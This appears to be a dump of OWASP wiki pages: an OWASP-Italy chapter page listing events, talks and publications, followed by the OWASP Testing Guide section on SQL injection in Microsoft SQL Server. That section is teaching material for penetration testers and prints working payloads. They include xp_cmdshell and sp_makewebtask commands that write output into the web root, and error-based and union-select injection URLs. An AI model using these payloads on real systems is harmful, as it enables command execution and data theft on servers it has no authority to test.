<td valign=top>11.00h</td><td bgcolor="#eeeeee">"Le problematiche di Web Application Security: la visione di ABI" Matteo Lucchetti, Romano Stasi - ABI</td>
</tr>
<tr>
<td valign=top>11.30h</td><td bgcolor="#b9c2dc">"OWASP Backend Security Project" Carlo Pelliccioni - Spike Reply</td>
</tr>
<tr>
<td valign=top>12.00h</td><td bgcolor="#BCA57A">Buffet</td>
</tr>
<tr>
<td valign=top>14.00h</td><td bgcolor="#eeeeee">"Web Services and SOA Security " (ENG) Laurent Petroque, Alfredo Vistola - F5</td>
</tr>
<tr>
<td valign=top>14.30h</td><td bgcolor="#b9c2dc">"How to start a software security initiative within your organization: a maturity based and metrics driven approach." Marco Morana - CISO Citigroup</td>
</tr>
<tr>
<td valign=top>15.00h</td><td bgcolor="#eeeeee">"Secure Programming with Static Analysis" (ENG) Jacob West - Head of Fortify Software's Security Research Group</td>
</tr>
<tr>
<td valign=top>15.30h</td><td bgcolor="#b9c2dc">"The Owasp Orizon project: internals and hands on" Paolo Perego - Spike Reply</td>
</tr>
<tr>
<td valign=top>16.00h</td><td bgcolor="#BCA57A">Coffe break</td>
</tr>
<tr>
<td valign=top>16.30h</td><td bgcolor="#eeeeee">"Internet Banking e Web Security" Giorgio Fedon - Minded Security</td>
</tr>
<tr>
<td valign=top>17:00h</td><td bgcolor="#eeeee1">Round table: Quali sono le contromisure che le aziende stanno adottando ai nuovi possibili attacchi? Responsible disclosure: quale è il miglior approccio? Come si può implementare un ciclo di vita del software con processi di sicurezza garantendo un adeguato ROSI? La sensibilizzazione degli utenti: leva fondamentale al fine di implementare controlli di sicurezza?
 Panelist: Raoul Chiesa - CTO MediaService, Matteo Flora, Matteo Lucchetti - ABI, Marco Morana - Citigroup, Stefano Di Paola - CTO Minded Security, Keynote: Matteo Meucci</td>
</tr>
</table>
</center>

== Where ==

Centro Congressi dell'Università di Roma "La Sapienza".
Via Salaria, 113 Roma.

'''Subscriptions:'''

To subscribe to the event please send an email with the subject "OWASP Day 2" to the following address: 
mastersicurezza<at>di.uniroma1.it

Entrance is FREE for all the subscribed persons (300 seats).

----

Italy

2007-09-06T13:27:39Z

Icesurfer: /* NEXT EVENT:: September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" */

{{Chapter Template|chaptername=Italy|extra=The chapter leader is [mailto:matteo.meucci@gmail.com Matteo Meucci]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-italy|emailarchives=http://lists.owasp.org/pipermail/owasp-italy}}

== NEXT EVENT:: September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ==
----
[[Image:Master.jpg]]

Thanks to the collaboration with the [http://mastersicurezza.uniroma1.it Master on Information Security of the Universita di Roma "La Sapienza"], we have organized the OWASP Day here in Italy next 10th September 2007 during the Global Security Week.
 
The event sponsor is [http://www.watchfire.com Watchfire]:

[[Image:Watchfire.gif]]

 
* The topic will be Web Application Security & Privacy and we will have 6 talks: a set technical and a set more at high level.

This is the agenda (alpha version):

Participants registration: 9.00-9.15 
Start meeting: 9.15

* 9.15-9.30. Prof. L.Mancini (Director of the Master in Information Security, Univesità "La Sapienza" Rome):
"Welcome and open of the works"

* 9.30-9.45 M.Meucci (OWASP-Italy Chair, CEO Minded Security):
"Introduction to the OWASP-Day and OWASP-Italy projects"

* 9.45-10.15. Mauro Bregolin (Principal Consultant - KIMA Projects & Services):
"Privacy in the digital era"

* 10.15-10.45. Carlo Pelliccioni (Security Consultant - @Mediaservice.net):
"OWASP Top 10 2007 - Are our information "really" safe?"

* 10.45-11.15. Alberto Revelli (Senior Consultant - Portcullis Computer Security):
"Anti-Anti-XSS: bypassing browser protections"

* 11.15-11.45. Coffe break

* 11.45-12.15. Laurent Petroque (F5):
"Growing Application Security Awareness".

* 12.15-12.45. Luca Carettoni (Security Consultant - SecureNetwork):
"Buzzwords Security"

* 12.45-13.30. Danny Allan (Director of Security Research - Watchfire):
"Hacker Attacks on the Horizon: Understanding the Top Web 2.0 Attack Vectors"

* Where: Alfa room: Informatics Department - "La Sapienza" University Via Salaria 113, Rome

* Participation: to partecipate to the OWASP Day please send an e-mail with object "OWASP Day: Privacy in the 21st Century " to the following address: mastersicurezza <at> di.uniroma1.it Entrance is FREE.
We have received more than 100 subscriptions, so we are sorry but the REGISTRATION IS CLOSED.

[https://www.owasp.org/index.php/OWASP_Day Here] you can read about the global OWASP-Day.

== Local Activities ==

* There is already a qualified group (CISSP, CISA, BS7799 Lead Auditor, OPST, OPSA) of volunteers working on the following tasks:
<ul>
- Working at the new OWASP Testing Guide! (Matteo Meucci, Alberto Revelli, Stefano Di Paola, Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin) 
- Translate all OWASP documentations in italian language (Matteo Paolelli, Massimiliano Graziani) 
- Writing articles about OWASP Project for infosecmag (Matteo Meucci, Alessandro Graziani, Lorenzo De Santis, Marco Graia, Luca Carettoni, Carlo Pelliccioni) 
- Working at the project OWASP Legal (Dario Vaccaro, Marco Scialdone) 
- Working at the project OWASP Code Review (Paolo Perego) 
- Developing WebAppSec tools & Research (Stefano Di Paola, Daniele Bellucci, Alberto Revelli, Antonio Parata)
</ul>

== OWASP-Italy Board ==
* This is the (not official) '''OWASP-Italy Board''':
<ul>
Founder and Chair: Matteo Meucci 
Director of Communication: Raoul Chiesa 
Technical Director : Alberto Revelli 
R&D Director: Stefano Di Paola 
Technical Writer Director: Lorenzo De Santis 
Italian Translation of docs and papers: Matteo Paolelli, Massimiliano Graziani. 
Official active members: Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin, Paolo Perego, Daniele Bellucci.
</ul>

== What is OWASP? ==

[http://www.isacaroma.it/html/newsletter/?q=node/78 Here] you can read an interview talking about OWASP.

== OWASP-Italy is a CLUSIT Member ==

http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations.
So OWASP-Italy is now a [http://www.clusit.it/soci.htm CLUSIT member] and CLUSIT is an OWASP Educational Member

== NEWS: OWASP-Italy at InfoSecurity 07 ==

* (Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )
[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

* (Oct 06) ISACA Roma has published several interview with OWASP-Italy members:
[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]]
[[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli]]
[[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]]
[[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]]
[[http://www.isacaroma.it/html/newsletter/node/328 Carlo Pelliccioni]] 

* (Sep 06) Paolo Perego has created the new '''OWASP Orizon Project'''. Go to [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project OWASP Orizon Project] 

* (Sep 06) Matteo Meucci has been selected as the new editor of the '''OWASP Testing Guide v2'''. See OWASP [http://www.owasp.org/index.php/OWASP_Autumn_Of_Code_2006_:_Selected_Projects_Press_Release press release] and go to [http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Project v2]

* (Sep 06) Carlo Pelliccioni is writing an article about the [http://www.owasp.org/index.php/Analysis_about_error_codes analysis of error codes] received by web servers.

* Top10 Vulnerabilities - OWASP-Italy survey:
[[Image:Top 10 vulnerabilities-mini.GIF]]

* (21 Jun 06) '''Infosecurity 2006''': the event is organized and managed by the CLUSIT.
Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications".
[http://www.infosecurity.it/Roma/programma.php More info here]

* (1 Jun 06) '''"Quaderno CLUSIT"'''
CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP".
Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.

* (31 May 06) Luca Carettoni has published the article '''"La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project".''' [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

* (1 Mar 06) '''OWASP-Boston, Microsoft'''
Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting.
[http://www.owasp.org/local/boston.html More info here]

* (18 Nov 05) '''IDC - European Banking Forum'''
Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the [http://www.idc.com/italy/events/banking05/banking05_agenda.jsp IDC European IT Banking Forum 2005].
Agenda:
- New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
- Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy

* (Oct 05) '''SMAU 2005''' is the 42a International ICT & Consumer Electronics Exhibition for Italy.
SMAU has accepted our submission! [http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili More info here]

* (Giu 05) Thanks to Massimiliano Graziani we have translated in italian the '''"OWASP Pen Test Checklist v.1.1"'''. You can download it [http://www.owasp.org/documentation/testing.html here.]
Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

* (May 05) '''ISACA Roma Newsletter''' has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

* (Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

* The presentation of the seminar we have done in '''ISACA Rome''' (31th March 2005) is now available [http://www.isacaroma.it/pdf/050331/meucci.zip here.]

* (Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

* (Mar 05) Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

== Events ==

=== September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ===
----
[[Image:Master.jpg]]

Thanks to the collaboration with the Master on Information Security of the Universita di Roma "La Sapienza" (http://mastersicurezza.uniroma1.it), we are organizing the OWASP Day here in Italy next 10th September 2007 during the Global Security Week.

[http://www.owasp.org/index.php/Italy#NEXT_EVENT::_September_10th.2C_2007_-_OWASP_Day_WorldWide:_.22Privacy_in_the_21st_Century.22 Here you can read updated information about the event]

=== May 29th, 2007 - Seminar: "Software Security" ===
----

* Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: [http://www.sicurinfo.it/informazioni/visinf.asp?IDInfo=246&CAT=53 "Which approaches to Software Security"] organized by Firenze Tecnologia.

=== May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy ===
----

* We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.
[http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007 Here] you can find all the details about the conference, cfp and sponsorship.

=== April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza"===
----

* We have done a 4h seminar for the students of [http://mastersicurezza.uniroma1.it/ Master on Information Security at "La Sapienza"] for the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=projects:asp Application Security Project of "La Sapienza" University.]

=== March 30th, 2007 - University of Rome "La Sapienza" ===
----

* Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"
[http://w3.uniroma1.it/security/Eventi/eventi.html Here] you can find more details.

=== March 1st, 2007 - EuSecWest 07 ===
----

Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at [http://www.eusecwest.com/agenda.html EUSecWest].
[http://www.owasp.org/images/e/e9/OWASP_Testing_Guide_Presentation_EUSecWest07.zip Here] you take a look at the presentation.

=== February 6th-8th, 2007 - InfoSecurity ===
----

* February 6th:15.30
After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0"
More information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=aqfi82GOKd6I748s1evI8Q%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

* February 6th:16.30
After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide"
More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=nq6tSIuRoPVJBanBSsRiSQ%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

* February 7th:12.30
Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies."
More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=3z04F5BgZRgfU0YX8JRYtA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here]

* February 7th:13.30
Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice"
More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=9HePIzyo5p29ylpGBl6CiA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

=== January 25th, 2007 - Isaca Rome ===
----
Matteo Meucci will discuss the new [http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide v2] 
For more information: 
http://www.isacaroma.it/html/GiornateDiStudio.html

=== October 7th, 2006 - SMAU 2006 ===

----
- "''The quest for secure code: code review and fundamental of secure coding.''"
Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities.
Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases
http://www.webb.it/event/eventview/5772

Here are the presentations: 
[[Image:Meucci_SMAU06.pdf| Meucci_SMAU06]] 
[[Image:Perego_SMAU06.pdf| Perego_SMAU 06]]

- "''Advanced SQL Injection.''"
Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing.
Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" !
http://www.webb.it/event/eventview/5774

[[Image:Revelli_SMAU06.pdf|Revelli_SMAU06 ]] 
[[Image:Parata_SMAU06.pdf|Parate_SMAU06]] 

[[Image:OWASP-Italy_at_SMAU06_2.JPG]]
Luca, Carlo, Alberto, Antonio, Stefano 
Matteo, Paolo, Giorgio

=== September 29th, 2006 - OpenExp 2006 ===

----
September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security.
It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs.
http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.

[[Image:Antonio_Matteo_Carlo.JPG]]
[[Image:Antonio_speech.JPG]]
[[Image:Carlo.JPG]]
[[Image:Claudio_Luca.JPG]]
[[Image:Mayhem_Matteo.JPG]]
[[Image:OWASP_Banner2.JPG]]
[[Image:OWASP_Banner.JPG]]

=== June 21th, 2006 - InfoSecurity 2006 ===

----
Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100
When: 10,30 - 17,00
Who: Matteo Meucci and Alberto Revelli
Link: http://www.infosecurity.it/Roma/programma.php

Agenda:
-- I Session --
Introduction to Web Application Security
• Which are the risks?
• Risk assessment of a web application
• Core pillars of web security
How to develop secure web applications:
• Guidelines and case-studies

-- II Session --
How to realize a security audit of a web application
• The methodology OWASP Penetration Testing
• The tools: OWASP WebScarab
• Hands-on web application vulnerabilities: OWASP WebGoat
• Advanced SQL Injection.

=== March 1st, 2006 - OWASP-Boston, Microsoft ===

----

Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march.
[http://www.owasp.org/index.php/Boston More info here]

=== November 5th, 2005 - IDC - European Banking Forum ===

----

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp
Agenda:
* New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
* Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report [http://cdn.idc.com/italy/downloads/report_banking05_eng.pdf here].

You can download the Case-Study of a vulnerable Home Banking Web Application [http://www.owasp.org/docroot/owasp/misc/IDC_BankingForum05v1.ppt here].

=== October 5th, 2005 - OWASP-Italy@SMAU2005 ===

----

SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy.
Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security.
Alberto has presented his new project: [http://sqlninja.sourceforge.net sqlninja]. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

=== May 25th, 2005 - ISACA Rome 2nd meeting ===

----

May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability.
Every one is invited to join the meeting.

Here is the agenda:
14.30 Registration
14.45 Matteo Meucci - Web Application Security Phase II
- OWASP WebScarab and PenTest Checklist
* A case-study of a Web Application Vulnerability: MMS Spoofing
--- Web Application analysis
--- Authentication and Billing of the MMS service
--- Vulnerabilities
--- Attack Analysis
* Learning the most common web application vulnerabilities: OWASP WebGoat
--- Http Basics
--- HTML Clues
--- Hidden Field Tampering
--- How to spoof a Session Cookie
--- Stored Cross Site Scripting
--- Command Injection
--- SQL Injection
--- Fail Open Authentication

The meeting is hold at:
Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation [http://www.isacaroma.it/pdf/050525/OWASP.zip here].

=== May 18th, 2005 - Workshop on Computer Crime 2005 ===

----

May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled:
"EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation [http://www.owasp.org/images/a/aa/Top10-ComputerCrimes.ppt here].

=== March 31th, 2005 - ISACA Rome meeting ===

----

March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda:
14.15 Registration
14.30 Matteo Meucci - Web Application Security
- OWASP Guide: how to build secure web application
- How to test your Web Application: WebScarab and the WebApp PenTest Checklist
- How to learn the most common web application vulnerability: WebGoat
- The Top Ten WebApp vulnerabilities
- Common error on developing Web Application:
Authentication mechanisms not "secure"
Buffer Overflow and crash of the service
Thief of identity: Cross Site Scripting
Manipulation of company data: SQL Injection
Reserved information: misconfiguration
Bad session management and thief of identity
- OWASP-Italy: projects and next challenges

The meeting is hold at:
Via Volturno, 65 (Rome) - Auditorium ATAC
http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation [http://www.isacaroma.it/pdf/050331/meucci.zip here].

=== March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb ===

----

March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to [http://www.almaweb.unibo.it/830.dyn Master in Management and Information Technology] titled “Web Application Security and OWASP”.

Here is the agenda:
- OWASP & Web Application Security
- Common Web Application Vulnerabilities
- A real case of web application vulnerability: MMS Spoofing&Billing
- Training: WebGoat

== Publications ==

=== March, 2007 Interview on HTML.it ===
----
Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )
[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

=== October, 2006 ISACA Roma interviews OWASP-Italy ===
----
After the speeches that OWASP-Italy has done at [http://www.smau.it/catnews.asp?l=2&codcat=385 SMAU E-Academy 2006], ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian):
 
[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]]
[[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli ]]
[[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]]
[[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]]
[[http://www.isacaroma.it/html/newsletter/node/322 Stefano Di Paola & Giorgio Fedon]]

=== Aug, 2006 - Article on Banca Finanza magazine ===
----
Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

=== June, 2006 - Quaderno CLUSIT ===

----

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP".
Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

=== June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference ===

----

Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform.
[http://www.ictsc.it/papers/sqlInferenceOnMySql.html Here]you can read the full article.

=== May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities ===

----

Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

=== June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian ===

----

Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it [http://www.owasp.org/documentation/testing.html here.]
Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

=== May, 2005 - Isaca Roma Newsletter about OWASP-Italy ===

----

ISACA Roma Newsletter has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

=== April, 2005 - Published "MMS Spoofing" ===

----

We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78):
"Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See:
www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

=== April, 2005 - Published an article on ICT Security magazine ===

----

We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

=== March, 2005 - OWASP Top-10 in Italian ===

----

Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

----

== Tools & Research ==

----

=== Dec, 2006 - Sqlmap v0.2 ===

Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://sqlmap.sourceforge.net/ Here] you can download the tool

=== September, 2006 - Wisec Project ===

Stefano Di Paola is developing Wisec - The Wiki Security Project [http://www.wisec.it Here] you can accesses the project.

=== July, 2006 - Sqlmap v0.0.1 ===

Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://www.linux.it/~belch/?p=17 Here] you can download the tool

----

Testing for SQL Server

2007-03-10T15:34:29Z

Icesurfer:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
 
In this paragraph we describe some [http://www.owasp.org/index.php/SQL_Injection_AoC SQL Injection] techniques that utilize specific features of Microsoft SQL Server.
 

== Short Description of the Issue ==
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute of SQL code under the privileges of the user used to connect to the database.

As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:

* Application parameters in query strings (e.g., GET requests)
* Application parameters included as part of the body of a POST request
* Browser-related information (e.g., user-agent, referer)
* Host-related information (e.g., host name, IP)
* Session-related information (e.g., user ID, cookies)

Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application that the penetration tester has to know in order to exploit them along the tests.

== Black Box testing and example ==

===SQL Server Peculiarities===

To begin, let's see some SQL Server operators and commands/stored procedures that are useful in a SQL Injection test:

* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)
* query separator: ; (semicolon)
* Useful stored procedures include:
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running. By default, only '''sysadmin''' is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
** '''xp_regread''' reads an arbitrary value from the Registry (undocumented extended procedure)
** '''xp_regwrite''' writes an arbitrary value into the Registry (undocumented extended procedure)
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin''' privileges.
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.
 
Let's see now some examples of specific SQL Server attacks that use the aformentioned functions. Most of these examples will use the '''exec''' function.

Below we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file, assuming that the web server and the DB server reside on the same host. The following syntax uses xp_cmdshell:
<pre>
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
</pre>
Alternatively, we can use sp_makewebtask:
<pre>
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
</pre>
A successful execution will create a file that it can be browsed by the pen tester. Keep in mind that sp_makewebtask is deprecated and, even if it works to all SQL Server versions up to 2005, might be removed in the future.

Also SQL Server built-in functions and environment variables are very handy: The following uses the function '''db_name()''' to trigger an error that will return the name of the database:
<pre>
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
</pre>
Notice the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:
<pre>
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )
</pre>
CONVERT will try to convert the result of db_name (a string) into an integer variable, triggering an error that, if displayed by the vulnerable application, will contain the name of the DB.

The following example uses the environment variable '''@@version ''', combined with a "union select"-style injection, in order to find the version of the SQL Server.
<pre>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--
</pre>
And here's the same attack, but using again the conversion trick:
<pre>
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)
</pre>
